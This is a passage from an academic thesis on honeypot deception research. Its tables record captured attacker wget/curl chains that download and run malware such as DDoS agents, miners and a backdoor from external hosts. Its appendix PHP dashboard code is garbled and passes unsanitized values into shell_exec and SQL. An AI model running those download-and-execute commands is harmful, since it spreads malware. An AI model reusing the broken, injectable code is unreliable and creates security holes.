There were 25 wget file transfers, which were more than double those of Phase 2C, and they comprised 15 unique files. The number of unique sets of inputs increased from 25 in Phase 2C to 30 in Phase 2D. Table 9 summarizes the file-transfer attempts and the deception techniques that were implemented for that transfer attempt.

Table 9. Summary of wget file transfers and deception technique used for Phase 2D.

<table>
<thead>
<tr>
<th>No.</th>
<th>Time</th>
<th>Command</th>
<th>Deception Technique</th>
</tr>
</thead>
<tbody>
<tr>
<td>No.</td>
<td>Time</td>
<td>Command</td>
<td>Deception Technique</td>
</tr>
<tr>
<td>-----</td>
<td>------------------</td>
<td>------------------------------------------------------------------------</td>
<td>------------------------------------------</td>
</tr>
<tr>
<td>24</td>
<td>19/8/2018 4:44</td>
<td>wget <a href="http://IP">http://IP</a> H/i3306m curl -O <a href="http://IP">http://IP</a> H/i3306m chmod +x i3306m ./i3306m</td>
<td>Cowrie unable to process command string</td>
</tr>
<tr>
<td>25</td>
<td>19/8/2018 3:18</td>
<td>wget <a href="http://IP">http://IP</a> H/i3306m curl -O <a href="http://IP">http://IP</a> H/i3306m chmod +x i3306m ./i3306m</td>
<td></td>
</tr>
</tbody>
</table>

In this phase, we observed one file transfer identical to Figure 31 from Phase 2B. While in Phase 2B, the transfer timed out, and the delay was not successfully imposed on the client; we successfully made the client wait for 58 seconds before our honeypot allowed the file transfer to begin. This confirms our suspicion that a non-interactive session typically terminates after a set of commands completes. Thus, if we implement a delay prior to beginning the file transfer, the client will only exit the session after the transfer is completed or will be terminated when the transfer timed out. Even when attackers encountered delays or false excuses (Table 8, rows 8 and 9), they would continue to attempt to transfer files on the honeypot. This suggests that these bots do not have any real-time capability to sense the responses provided to them. Thus, when they encountered a false excuse when transferring files from themselves, they were unable to recognize that they were false and continued to try to transfer files.
C. COMPARISON OF DATA ACROSS PHASES

1. Distinct IP Addresses that Accessed Cowrie throughout All Phases

- Twenty-four distinct IP addresses were recorded by Cowrie over the phases. We grouped the IP addresses based on their consistent behaviors throughout the phases, and there were five distinct groups. We found that all 24 attackers, apart from performing probing and authentication, did no further actions like executing commands in Cowrie. We concluded that these IP addresses are probably scanners used for footprinting SSH servers. Details of different groups’ attack patterns are given below.

- Group 1: There were 14 IP addresses in this group. All these attackers merely probed our honeypot and did not attempt to perform any authentication. These are most probably horizontal scanners checking if SSH port 22 is open.

- Group 2: There were two IP addresses (A from Hanoi, Vietnam and B from the Naval Postgraduate School) in this group. As shown in Figure 45, attacker A found the username “admin” and password “admin” combination after three tries in Phase 1, whereas in Figure 46, attacker B found the username “root” and password “root” on the first attempt. In the subsequent phases, both attackers probed our honeypot and did not attempt any authentication. We also saw attacker B accessing our SNARE website. We deemed that these two attackers were checking whether our SSH server was still operational in the subsequent phase.

Figure 45. Group 2 attacker A login activity in Phase 1.
Group 3: There was one IP address (C from Ireland) in this group. From Figure 47, the attacker found the username “admin” and password “admin” combination in the first try in Phase 1. In the subsequent phases, the attacker continued to use the same username and password combination to log into our honeypot every five minutes.

Group 4: There were three IP addresses (D from Netherlands, E from Ukraine, and F from Latvia) in this group. In Phase 1, the attackers found the username “admin” and password “admin” combinations. Figure 48 shows the login activity by attacker D. In the subsequent Phases 2A, 2B, 2C, and 2D, all used the username “22” and password “master” in their authentications despite having a successful login in Phase 1. Figure 49 shows login activity by attacker D in Phase 2A. Since they are from different locations and followed the same attack patterns throughout our phases, these are most likely bots that have been infected and controlled by the same command-and-control center.
Figure 48. Group 4 attacker D login activity in Phase 1.

![Figure 48](image-url)

Figure 49. Group 4 attacker D login activity in Phase 2A.

![Figure 49](image-url)

- Group 5: Four IP addresses (G from France, H from the United States, J from Canada, and K from Russia) were in this group. In Phase 1, all the attackers managed to find the username “root” and password “123456” and/or username “admin” and password “admin” combinations. Figure 50 shows login activity by attacker G in Phase 1. In Phase 2A, all of them started their attacks using another set of around 25 username and password combinations as shown in Figure 51; they logged in with username “admin” and password “password”. In Phase 2B, they used another set of around 28 username and password combinations as shown in Figure 52; they could not log in to Cowrie since they did not have the correct username and password. In Phase 2C, they reused the username “admin” and password “password” and could log in to Cowrie as shown in Figure...
53; two attackers repeated the username and password combination nine times, and the other two attackers repeated it ten times. In Phase 2D, they continued using the failed username and password combination in Phase 2B and were unable to log in to Cowrie. Since they are from different locations and used the same attack patterns throughout, these are most likely bots controlled by the same bot command-and-control center.

Figure 50. Group 5 attacker G login activity in Phase 1.

---

Figure 51. Group 5 attacker H login activity in Phase 2A.
Figure 52. Group 5 attacker H login activity in Phase 2B.

<table>
<thead>
<tr>
<th>Timestamp</th>
<th>IP</th>
<th>Session</th>
<th>Username</th>
<th>Password</th>
<th>Success</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>

Figure 53. Group 5 attacker H login activity in Phase 2C.

<table>
<thead>
<tr>
<th>Timestamp</th>
<th>IP</th>
<th>Session</th>
<th>Username</th>
<th>Password</th>
<th>Success</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>

2. **Common Scripts Found in Different Phases**

The five scripts shown in Figure 31 were found in Phases 1, 2A, 2C, and 2D. Instead of using the *wget* command to transfer files onto the SSH server, these clients pipe the content of files from the client terminal to SSH sessions running the client’s...
script. For example, when the command “echo “Hello World” | ssh root@localhost ‘cat > /tmp/test.txt’” is entered at the client terminal, only the command “cat > /tmp/test.txt” is visible to the SSH server. The test “Hello World,” however, would be sent through the SSH session into the file “test.txt.” We scanned the five files on the Virustotal Web site and found them to be a PNScan Trojan [37] used to infect devices based on ARM, MIPS, or PowerPC architectures.

3. Unique wget File Transfer Attempts in Different Phases

Twenty-six unique wget commands were executed on our SSH honeypot across the five phases (Table 9). We observed identical commands within each phase and also a similar command that was repeated across phases, with changes to the source IP address. There were only five successful transfers, and they occurred in Phases 1 and 2A only. The high number of failures were mainly due to Cowrie being unable to handle complex command strings such as “wget http://IP A/isu80 curl -O http://IP A/isu80 chmod +x isu80 ./isu80”. Such inputs are recognized by SSH servers as four commands, but Cowrie treats them as a single command and cannot understand it. We also found that about 58% of the wget commands tried to transfer the files from their source IP address. The wget commands that attempted to connect to other hosts mostly timed out, probably due to the host being offline.

Table 10. Summary of wget transfer attempts.

<table>
<thead>
<tr>
<th>No.</th>
<th>wget command</th>
<th>Phase</th>
<th>Successful</th>
<th>Remarks</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>wget <a href="http://IP">http://IP</a> address/isu80 curl -O <a href="http://IP">http://IP</a> address/isu80 chmod +x isu80 ./isu80</td>
<td>1, 2C</td>
<td>No</td>
<td>Transfer from self</td>
</tr>
<tr>
<td>2</td>
<td>wget <a href="http://IP">http://IP</a> address/i3306m curl -O <a href="http://IP">http://IP</a> address/i3306m chmod +x i3306m ./i3306m</td>
<td>1, 2A</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>3</td>
<td>wget -q <a href="http://IP">http://IP</a> address/drago/images/ ssh/y.txt</td>
<td>1</td>
<td>Yes</td>
<td>Perl script</td>
</tr>
<tr>
<td>4</td>
<td>wget <a href="http://IP">http://IP</a> address/g3308l curl -O <a href="http://IP">http://IP</a> address/g3308l chmod +x g3308l ./g3308l</td>
<td>1</td>
<td>No</td>
<td>Transfer from self</td>
</tr>
<tr>
<td>No.</td>
<td>wget command</td>
<td>Phase</td>
<td>Successful</td>
<td>Remarks</td>
</tr>
<tr>
<td>-----</td>
<td>--------------</td>
<td>-------</td>
<td>------------</td>
<td>---------</td>
</tr>
<tr>
<td>5</td>
<td>wget <a href="http://IP">http://IP</a> address/g3308l curl -O <a href="http://IP">http://IP</a> address/g3308l chmod +x g3308l /g3308l</td>
<td>1</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>6</td>
<td>wget <a href="http://IP">http://IP</a> address/ys808e curl -O <a href="http://IP">http://IP</a> address/ys808e chmod +x ys808e ./ys808e</td>
<td>1</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>7</td>
<td>wget <a href="http://IP">http://IP</a> address:5620/1x63</td>
<td>1</td>
<td>Yes</td>
<td>DDos Agent</td>
</tr>
<tr>
<td>8</td>
<td>wget <a href="http://IP">http://IP</a> address:5620/netwrite</td>
<td>1</td>
<td>Yes</td>
<td>BitCoin Miner</td>
</tr>
<tr>
<td>9</td>
<td>wget <a href="http://IP">http://IP</a> address/ys53a curl -O <a href="http://IP">http://IP</a> address/ys53a chmod +x ys53a ./ys53a</td>
<td>1</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>10</td>
<td>wget <a href="http://IP">http://IP</a> address/a21jj curl -O <a href="http://IP">http://IP</a> address/a21jj chmod +x a21jj ./a21jj</td>
<td>1,2C</td>
<td>No</td>
<td>Transfer from self</td>
</tr>
<tr>
<td>11</td>
<td>wget <a href="http://IP">http://IP</a> address/ps23e curl -O <a href="http://IP">http://IP</a> address/ps23e chmod +x ps23e ./ps23e</td>
<td>1</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>12</td>
<td>wget <a href="http://IP">http://IP</a> address:223/2897</td>
<td>2A</td>
<td>Yes</td>
<td>DDoS-XOR.A</td>
</tr>
<tr>
<td>13</td>
<td>wget -O /tmp/103 <a href="http://IP">http://IP</a> address:222/103</td>
<td>2A</td>
<td>Yes</td>
<td>Backdoor Trojan</td>
</tr>
<tr>
<td>14</td>
<td>wget -c <a href="http://IP">http://IP</a> address:9960/chongfu.sh</td>
<td>2B, 2D</td>
<td>No</td>
<td>Timeout</td>
</tr>
<tr>
<td>15</td>
<td>wget -P/tmp <a href="http://IP">http://IP</a> address:8998/MysqlC.sh</td>
<td>2B</td>
<td>No</td>
<td>Exit Code: 1</td>
</tr>
<tr>
<td>17</td>
<td>wget <a href="http://IP">http://IP</a> address:2483/linuxxzw</td>
<td>2B</td>
<td>No</td>
<td>Timeout</td>
</tr>
<tr>
<td>18</td>
<td>wget <a href="http://IP">http://IP</a> address/ys808e curl -O <a href="http://IP">http://IP</a> address/ys808e chmod +x ys808e ./ys808e</td>
<td>2C</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>19</td>
<td>wget <a href="http://IP">http://IP</a> address/mi3307 curl -O <a href="http://IP">http://IP</a> address/mi3307 chmod +x mi3307 ./mi3307</td>
<td>2C</td>
<td>No</td>
<td>Transfer from self</td>
</tr>
<tr>
<td>20</td>
<td>wget <a href="http://IP">http://IP</a> address/ps23e curl -O <a href="http://IP">http://IP</a> address/ps23e chmod +x ps23e ./ps23e</td>
<td>2C</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>21</td>
<td>wget -q -O - <a href="http://dl.peanutman.ru/ptshell">http://dl.peanutman.ru/ptshell</a></td>
<td>2C</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>No.</td>
<td>wget command</td>
<td>Phase</td>
<td>Successful</td>
<td>Remarks</td>
</tr>
<tr>
<td>-----</td>
<td>---------------------------------------------------</td>
<td>-------</td>
<td>------------</td>
<td>---------</td>
</tr>
<tr>
<td>22</td>
<td>wget -O -q <a href="http://www.bizqsoft.com/imgtemplate/online.php">http://www.bizqsoft.com/imgtemplate/online.php</a></td>
<td>2C</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>23</td>
<td>wget <a href="http://IP">http://IP</a> address/rootankit.sh</td>
<td>2D</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>24</td>
<td>wget -O /tmp/xxx <a href="http://IP">http://IP</a> address:8080/xxx</td>
<td>2D</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>25</td>
<td>wget -O /root/tuan <a href="http://IP">http://IP</a> address/tuan</td>
<td>2D</td>
<td>No</td>
<td></td>
</tr>
<tr>
<td>26</td>
<td>wget -c <a href="http://IP">http://IP</a> address:8080/Ceo</td>
<td>2D</td>
<td>No</td>
<td></td>
</tr>
</tbody>
</table>

**D. EVALUATION OF DECEPTION TECHNIQUES**

We implemented the fake file deception techniques on the Web honeypot during Phase 2A. Attackers, however, did not access the files on the honeypot. One possible reason is that the attackers were mostly non-interactive bots preprogrammed to perform horizontal scanning and find vulnerable Web pages. Another possible reason is that our honeypot did not attract attackers who were interested in files. We concluded that the first reason is more likely as we observed many session durations less than one second.

On the SSH honeypot after fingerprinting the server, the next most common action was transferring malicious files onto the server, probably to try to reach back to a bot command and control or install a malicious software to further propagate the file. Most attackers would try to transfer the file from their host machines rather than use a common server. We also discovered attackers transferring files using a pipe command on the client end when initiating the SSH session instead of using the wget command during the SSH session. Such a technique makes it harder to detect the file transfer and difficult to implement any deception during the file transfer because the pipe command is only visible on the client machine and not the honeypot.

In Phases 2B and 2C, we wanted to be able to possess the files before we sent responses to the clients. When a client transferred files from its host machine, however, we would observe their session once the file transfer was completed. Since our deception
was sent only after the file transfer was completed, the deception did not happen in these cases.

Our experiments found that most of the SSH sessions were non-interactive SSH sessions. Such sessions send all their commands to the SSH server at the start of the session and do not interact with it thereafter. With such sessions, the client will not respond to deceptions during the same session.

Based on the data we collected from our experiment, it was apparent that attackers continue to try to transfer their files when they have failed previously. Yet, because there were insufficient successful transfers, it is difficult to know whether attackers would also try to transfer the files again even if they had successfully done so. Also, due to the passive nature of a non-interactive SSH session, we can effectively penalize attackers by imposing a delay prior to their file transfers.
VI. CONCLUSIONS AND FUTURE WORK

A. CONCLUSION

This thesis focused on how cyber attackers will react to deception techniques employed on honeypots. Our research collected data using SSH honeypot Cowrie and Web honeypot SNARE, which were deployed on a line provided by an Internet service provider. We ran five phases on Cowrie and two phases on SNARE where we used different deception techniques. We implemented the SNARE and Cowrie honeypots to appear as if the two were running on the same server. Only a few attackers accessed both honeypots. When they did so, they scanned them independently.

Several factors limited the effectiveness of our deception techniques. For fake file deception to work, we need a human attacker or a bot that understands the value of different files in the server. Nevertheless, our data says that the attackers were mostly bots that scanned the server for vulnerable files. Even when the files were available, the attackers did no further action. On the SSH honeypot, we observed that the SSH sessions were primarily non-interactive. Usually all the commands were sent at the start of the session, and the attackers did not check the responses we returned during the session. For such attackers, infinite delay is a good technique to penalize them, as it would be difficult for them to exit the session without human intervention. Defensive camouflage could work with abnormal responses from our honeypot. For false excuses, it could be used as a good response to stop attackers from transferring files that we have seen before onto the honeypot.

B. FUTURE WORK

Our work on the SSH honeypot focused on responding to clients using the wget command. However, attackers have alternative means of transferring files to the SSH server and it would be worthwhile to explore deception techniques against them. We also observed that many of the file-transfer attempts by clients did not complete successfully. It might be interesting to return a false response to the client indicating a successful transfer and observe what they would do next.
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APPENDIX A. INSTALLATION OF SNARE

Retrieving SNARE code
`git clone https://github.com/mushorg/snare.git`

Installation of `pip` to facilitate easy installation of SNARE
`sudo apt-get install python3-pip`

Installing SNARE with specific requirements
`sudo pip3 install -r requirements.txt`
`sudo pip3 install yarl==0.18.0`
`sudo pip3 install aiohttp==1.3.0`

Cloning a website
`sudo python3 clone.py --target http://www.montereynavyflyingclub.org`

Running SNARE with TANNER
`sudo python3 snare.py --port 80 --host 0.0.0.0 --page-dir www.montereynavyflyingclub.org --tanner *.129 (type in actual IP address)`

Testing SNARE
`http://localhost/`
APPENDIX B. INSTALLATION OF TANNER

Retrieving TANNER code

git clone https://github.com/mushorg/tanner.git

Installing Redis

sudo apt-get install redis-server

Installation of pip to facilitate easy installation of TANNER

sudo apt-get install python3-pip

Installing TANNER

sudo pip3 install -r requirements.txt
sudo pip3 install aiohttp==2.3.0
sudo python3 setup.py install

Installing Mongo database

sudo apt-get install php7.0 php7.0-fpm php7.0-mysql --y
sudo apt install composer
sudo composer require mongodb/mongodb
sudo apt install mongodb-clients
After installation, add the string “mongodb.so” to /etc/php/7.0/cli/php.ini and
/etc/php/7.0/apache2/php.ini
APPENDIX C. INSTALLATION OF COWRIE

Retrieving Cowrie code
git clone http://github.com/micheloosterhof/cowrie

Installing pre-requisites
sudo apt-get install git python-dev python-openssl openssh-server python-pyasn1 python-twisted authbind virtualenv libmpfr-dev libssl-dev libmpc-dev libffi-dev build-essential libpython-dev

Installation of pip to facilitate easy installation of Cowrie
sudo apt-get install python-pip

Installing Cowrie
sudo pip install --upgrade -r requirements.txt

Installing MySQL
sudo apt-get install mysql-server python-mysqldb

Configuring Cowrie to use MySQL
Change password by executing “mysql -u root -p”

At the MySQL prompt, create an empty Cowrie database by executing
CREATE DATABASE cowrie;
GRANT ALL ON cowrie.* TO cowrie@localhost IDENTIFIED BY 'cowrie';
Exit

After creating the empty Cowrie database, import the database structure by executing
USE cowrie;
source ./doc/sql/mysql.sql

Edit the Cowrie configuration file to use MySQL database
[database_mysql]
host = *.129 (type in actual IP address)
database = cowrie
username = cowrie
password = cowrie
port = 3306
APPENDIX D. MODIFIED CODE

We modified and created new Kippo-graph files in the Data Analysis machine to aid us in presenting the information in bar charts, pie charts, and tables. The files that were modified or created are listed in italics.

1. Replay inputs made by attackers using non-interactive login

```
var/www/html/kippo-graph/include/play.php

//Start - Codes to update ttylog if no ttylog not found in database
if ($rows == null) {
    $getTTYLogs = shell_exec($cowrie_path.'log/tty | grep '.$session);
    $array = preg_split("/
\r
\n\r/", $getTTYLogs);
    for ($i = 0; $i < count($array)-1; $i++) {
        $execute_Query = "Insert into ttylog set size = '88', session ="'.$session.'",
                        ttylog="log/tty/".$array[$i]."";
        R::exec($execute_Query);
    }
    $rows = R::getAll($db_query);
}
//End - Codes to update ttylog if no ttylog not found in database

//Start - Codes to replay ttylog
foreach ($rows as $row) {
    $log = $cowrie_path.$row['ttylog'];
    $output = $output . "<br>" .shell_exec($cowrie_path.'bin/playlog -m 0 '.$log)  ;
}
//End - Codes to replay ttylog

//Start - Codes to retrieve input commands from database “input” table
$db_query = "SELECT * from input where session =".$session.'";
$rows = R::getAll($db_query);

foreach ($rows as $row) {
    $output1 = $output1 . $row['input'] ."<br>";
}
echo "<pre>".$output1."</pre>";
//End - Codes to retrieve input commands from database “input” table
```
2. Attackers accessing both Cowrie and Snare

`var/www/html/kippo-graph/class/KippoIP.php`

```php
//Start - Connection to redis and storing data into data array
require "predis/autoload.php";
Predis\Autoloader::register();
try {
    $redis = new Predis\Client();
}
catch (Exception $e) {
    die($e->getMessage());
}
$keys = $redis->keys('*');
for ($i=0; $i<count($keys); $i++) {
    try {
        $this->data[$i] = json_decode($redis->get($keys[$i]), true);
    }
catch (Exception $e) {
    }
}
//End - Connection to redis and storing data into data array
//Start - Checking and displaying IP addresses that are in both Cowrie and Snare
$items=array();
for ($i=0; $i<count($this->data); $i++) {
    try{
        if(!in_array($this->data[$i]['peer']['ip'], $items)){
            $items[]=$this->data[$i]['peer']['ip'];
        }
    }
catch (Exception $e) {
    }
}
foreach ($rows as $row) {
    if (in_array($row['ip'],$items)) {
        echo '<tr class="light word-break" onclick="getIPinfo("' . $row['ip'] . '"">';
        echo '<td>Duplicate ' . $row['ip'] . '</td>;
    } else {
        echo '<tr class="light word-break" onclick="getIPinfo("' . $row['ip'] . '"">';
        echo '<td>' . $row['ip'] . '</td>;
    }
}
//End - Checking and displaying IP addresses that are in both Cowrie and Snare
```

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3. Snare-Graph
var/www/html/kippo-graph/class/SnareGraph.class.php

//Start - Connection to redis and storing data into data array
require "predis/autoload.php";
Predis\Autoloader::register();

try {
    $redis = new Predis\Client();
} catch (Exception $e) {
    die($e->getMessage());
}

$keys = $redis->keys("*");
for ($i=0; $i<count($keys); $i++) {
    try {
        $this->data[$i] = json_decode($redis->get($keys[$i]), true);
    } catch (Exception $e) {
    }
}

//End - Connection to redis and storing data into data array

//Start - Generate all the Snare-Graph charts
public function generateSnareGraphCharts()
{
    $this->createMostProbesPerDay();
    $this->createNumberOfConnectionsPerIP();
    $this->createTop10Paths();
    $this->createTop10UserAgents();
    $this->createAllAttacks();
}

//End - Generate all the Snare-Graph charts

//Start - Display total number of sessions
echo '<th>Total sessions</th>';
echo '<th>'. count($this->data) .'</th>'; 
//End - Display total number of sessions

//Start - Display total number of distinct IP addresses
$distinctIP = array();
for ($i=0; $i<count($this->data); $i++) {
    try{
        if(!in_array($this->data[$i]['peer']['ip'], $distinctIP)) {
            // Code for adding IP to $distinctIP array
        }
    } catch (Exception $e) {
    }
}

// End - Display total number of distinct IP addresses
$distinctIP[] = $this->data[$i]["peer"]['ip'];
}
}

catch (Exception $e) {
}
}

echo '<th>Distinct source IP addresses</th>);
echo '<th>'. count($distinctIP) . '</th>);

//End - Display total number of distinct IP addresses

//Start - Display operational time period
$start_time = 0;
$end_time = 0;
$start_time_index = 0;
$end_time_index = 0;

for ($i = 0; $i < count($this->data); $i++) {
    if ($i == 0) {
        $start_time = $this->data[0]["start_time"];
        $end_time = $this->data[0]["end_time"];
    }
    else {
        if ($start_time > $this->data[$i]["start_time"] && $this->data[$i]["start_time"] != 0) {
            $start_time = $this->data[$i]["start_time"];  
            $start_time_index = $i;
        }
        if ($end_time < $this->data[$i]["end_time"] && $this->data[$i]["end_time"] != 0) {
            $end_time = $this->data[$i]["end_time"];  
            $end_time_index = $i;
        }
    }
}

if (count($this->data)) {
    echo '<th colspan="2">Active time period</th>);
    echo '<th>Start date (first attack)</th>);
    echo '<th>End date (last attack)</th>);

    echo '<td>'. $this->data[$start_time_index]["start_strtime"] . '</td>);
    echo '<td>'. $this->data[$end_time_index]["end_strtime"] . '</td>);
}

//End - Display operational time period
//Start - Display top 10 IP addresses
$ipConnections=array();
for ($i=0; $i<count($this->data); $i++) {
    $ipConnections[$i]=$this->data[$i]['peer']['ip'];
}
$vals = array_count_values($ipConnections);

if (count($vals)) {
    arsort($vals);
    $count = 0;
    foreach($vals as $paramName => $value) {
        if ($count == 10) {
            break;
        }
        else {
            $dataSet->addPoint(new Point($paramName, $value));
        }
        $count++;
    }
}
//End - Display top 10 IP addresses

//Start - Display top 20 probes per day
$start_date = 0;
$probesDay = array();

for ($i=0; $i<count($this->data); $i++) {
    $probesDay[$i] = (int)((($this->data[$i]['start_time'])/86400);
}
$vals = array_count_values($probesDay);

//Most probes
if (count($vals)) {
    arsort($vals);
    foreach($vals as $paramName => $value) {
        if ($paramName!=0) {
            $dataSet->addPoint(new Point(date("Y-m-d", substr($paramName * 86400, 0, 10)), $value));
        }
    }
}
// Probes per day
if (count($vals)) {
    ksort($vals);
foreach($vals as $paramName => $value) {
    if ($paramName!=0) {
        $dataSet->addPoint(new Point(date("Y-m-d", substr($paramName * 86400, 0, 10)), $value));
    }
}

//End - Display top 20 probes per day

//Start - Display top 20 paths
$paths=array();
for ($i=0; $i<count($this->data); $i++) {
    $paths[$i]=$this->data[$i]['paths'][0]['path'];
}
$vals = array_count_values($paths);

if (count($vals)) {
    arsort($vals);
    $count = 0;
    foreach($vals as $paramName => $value) {
        if ($count == 10) {
            break;
        } else {
            $dataSet->addPoint(new Point($paramName, $value));
        }
        $count++;
    }
}

//End - Display top 10 paths

//Start - Display top 10 user agents
$user_agents=array();
for ($i=0; $i<count($this->data); $i++) {
    $user_agents[$i]=$this->data[$i]['user_agent'];
}
$vals = array_count_values($user_agents);

if (count($vals)) {
    arsort($vals);
    $count = 0;
    foreach($vals as $paramName => $value) {
        if ($count == 10) {
            break;
        }
    }
}
else {
    $dataSet->addPoint(new Point($paramName, $value));
    $count++;
}

//End - Display top 10 user agents

//Start - Display the frequency of each type of attack
$attack_types=array();
$sqli_attack=array();
$lfi_attack=array();
$rfi_attack=array();
$xss_attack=array();
$cmd_exec_attack=array();
$unknown_attack=array();

for ($i=0; $i<count($this->data); $i++) {
    $attack_types[$i]=$this->data[$i]['paths'][0]['attack_type'];
    if ($attack_types[$i] == "sqli") {
        $sqli_exec_attack[]=data[$i]['paths'][0]['path'];
    }
    elseif ($attack_types[$i] == "lfi") {
        $lfi_attack[]=data[$i]['paths'][0]['path'];
    }
    elseif ($attack_types[$i] == "rfi") {
        $rfi_attack[]=data[$i]['paths'][0]['path'];
    }
    elseif ($attack_types[$i] == "xss") {
        $xss_attack[]=data[$i]['paths'][0]['path'];
    }
    elseif ($attack_types[$i] == "cmd_exec") {
        $cmd_exec_attack[]=data[$i]['paths'][0]['path'];
    }
    elseif ($attack_types[$i] == "unknown") {
        $unknown_attack[]=data[$i]['paths'][0]['path'];
    }
}

$vals = array_count_values($attack_types);
$sqli_vals = array_count_values($sqli_attack);
$lfi_vals = array_count_values($lfi_attack);
$rfi_vals = array_count_values($rfi_attack);
$xss_vals = array_count_values($xss_attacks);
$cmd_exec_vals = array_count_values($cmd_exec_attack);
$unknown_vals = array_count_values($unknown_attack);

if (count($vals)) {
    arsort($vals);
    foreach($vals as $paramName => $value) {
        $dataSet->addPoint(new Point($paramName, $value));
    }
}

// End - Display the frequency of each type of attack

// Start - Display Top 10 of each attack types
if (count($sqli_vals)) {
    arsort($sqli_vals);
    $count = 0;
    foreach($sqli_vals as $paramName => $value) {
        if ($count == 10) {
            break;
        } else {
            $dataSet->addPoint(new Point($paramName, $value));
        }
        $count++;
    }
}

if (count($lfi_vals)) {
    arsort($lfi_vals);
    $count = 0;
    foreach($lfi_vals as $paramName => $value) {
        if ($count == 10) {
            break;
        } else {
            $dataSet->addPoint(new Point($paramName, $value));
        }
        $count++;
    }
}

if (count($rfi_vals)) {
    arsort($rfi_vals);
    $count = 0;
    foreach($rfi_vals as $paramName => $value) {
        if ($count == 10) {
            break;
        } else {
            $dataSet->addPoint(new Point($paramName, $value));
        }
        $count++;
    }
}

if (count($unknown_vals)) {
    arsort($unknown_vals);
    $count = 0;
    foreach($unknown_vals as $paramName => $value) {
        if ($count == 10) {
            break;
        } else {
            $dataSet->addPoint(new Point($paramName, $value));
        }
        $count++;
    }
}
foreach($rfi_vals as $paramName => $value) {
    if ($count == 10) {
        
    } else {
        $dataSet->addPoint(new Point($paramName, $value));
    }
    $count++;
}

if (count($xss_vals)) {
    arsort($xss_vals);
    $count = 0;
    foreach($xss_vals as $paramName => $value) {
        if ($count == 10) {
            
        } else {
            $dataSet->addPoint(new Point($paramName, $value));
        }
        $count++;
    }
}

if (count($cmd_exec_vals)) {
    arsort($cmd_exec_vals);
    $count = 0;
    foreach($cmd_exec_vals as $paramName => $value) {
        if ($count == 10) {
            
        } else {
            $dataSet->addPoint(new Point($paramName, $value));
        }
        $count++;
    }
}

if (count($unknown_vals)) {
    arsort($unknown_vals);
    $count = 0;
foreach($unknown_vals as $paramName => $value) {
    if ($count == 10) {
        break;
    } else {
        $dataSet->addPoint(new Point($paramName, $value));
    }
    $count++;
}

//End - Display Top 10 of each attack types

//Start - Display the top 10 SSH clients
$db_query = "SELECT clients.version, COUNT(client)
    FROM sessions INNER JOIN clients ON sessions.client = clients.id
    GROUP BY sessions.client
    ORDER BY COUNT(client) DESC
    LIMIT 10";
$rows = R::getAll($db_query);
if (count($rows)) {
    $chart = new HorizontalBarChart(600, 300);
    $dataSet = new XYDataSet();

    foreach ($rows as $row) {
        $dataSet->addPoint(new Point($row['version'] . " ", $row['COUNT(client)']));
    }

    $chart->setDataSet($dataSet);
    $chart->setTitle(TOP_10_SSH_CLIENTS);
    $chart->getPlot()->setGraphPadding(new Padding(5, 30, 70, 245));
    $chart->render(DIR_ROOT . "/generated-graphs/top10_ssh_clients.png");
}
//End - Display the top 10 SSH clients
4. Kippo-Hash

var/www/html/kippo-graph/class/KippoHash.class.php

//Start - Retrieving the distinct session from ttylog table
$db_query = "SELECT distinct session FROM ttylog";
$cowrie_path = COWRIE_PATH;
$rows = R::getAll($db_query);
$counter = 1;
//End - Retrieving the distinct session from ttylog table

//Start - Displaying the hashes of every inputs of each distinct session
foreach ($rows as $row) {
    //Retrieving the ttylogs
    $db_query1 = "SELECT ttylog, session FROM ttylog WHERE session="''. $row['session'].'"";
    $rows1 = R::getAll($db_query1);
    $output = "";
    $input = "";
    $ipAddress = "";

    //Retrieving the inputs from the sessions
    $db_query2 = "SELECT input from input where session = "''. $row['session'].'""";
    $rows2 = R::getAll($db_query2);
    foreach ($rows2 as $row2) {
        $input = $input ."<br />". $row2['input'];
    }

    //Retrieving the IP address from the sessions
    $db_query3 = "SELECT ip from sessions where id = "''. $row['session'].'""";
    $rows3 = R::getAll($db_query3);
    foreach ($rows3 as $row3) {
        $ipAddress = $row3['ip'];
    }

    $first = true;
    foreach ($rows1 as $row1) {
        echo '<tr class="light word-break">';
        echo '<td>' . $counter . '</td>';
        echo '<td>' . $ipAddress . '</td>';
        echo '<td>' . $row['session']. '</td>';
        echo '<td>' . $row1['ttylog']. '</td>';
        $log = $cowrie_path.$row1['ttylog'];
        $output = shell_exec($cowrie_path.'bin/playlog -m 0 '.$log)  ;
        echo '<td>' . md5($output). '</td>';
if ($first) {
    echo '<td> ' . md5($input) . ' </td> ;
    $first = false;
    $input_array[$input_counter] = $input;
    $input_counter++;
}
echo '</tr> ;
$counter++ ;
}

//End - Displaying the hashes of every inputs of each distinct session
APPENDIX E. INSTALLATION OF KIPPO-GRAPH

Installing Maxmind
mkdir maxmind
cd maxmind
gunzip GeoLite2-Country.mmdb.gz
rm GeoLite2-Country.mmdb.gz

Retrieving Kippo-Graph code

Installing pre-requisites
apt-get update && apt-get install -y libapache2-mod-php5 php5-mysql php5-gd php5-curl

Installing Kippo-Graph
mv kippo-graph-VERSION.tar.gz /var/www/html
cd /var/www/html
sudo tar zxvf kippo-graph-VERSION.tar.gz
sudo mv kippo-graph-VERSION kippo-graph
sudo cd kippo-graph
sudo chmod 777 generated-graphs
sudo cp config.php.dist config.php

Installing MySQL
sudo apt-get install mysql-server python-mysqldb

Configuring Kippo-Graph to use MySQL and Maxmind
var/www/html/kippo-graph/config.php

MySQL
define('DB_HOST', '127.0.0.1');
define('DB_USER', 'cowrie');
define('DB_PASS', 'cowrie');
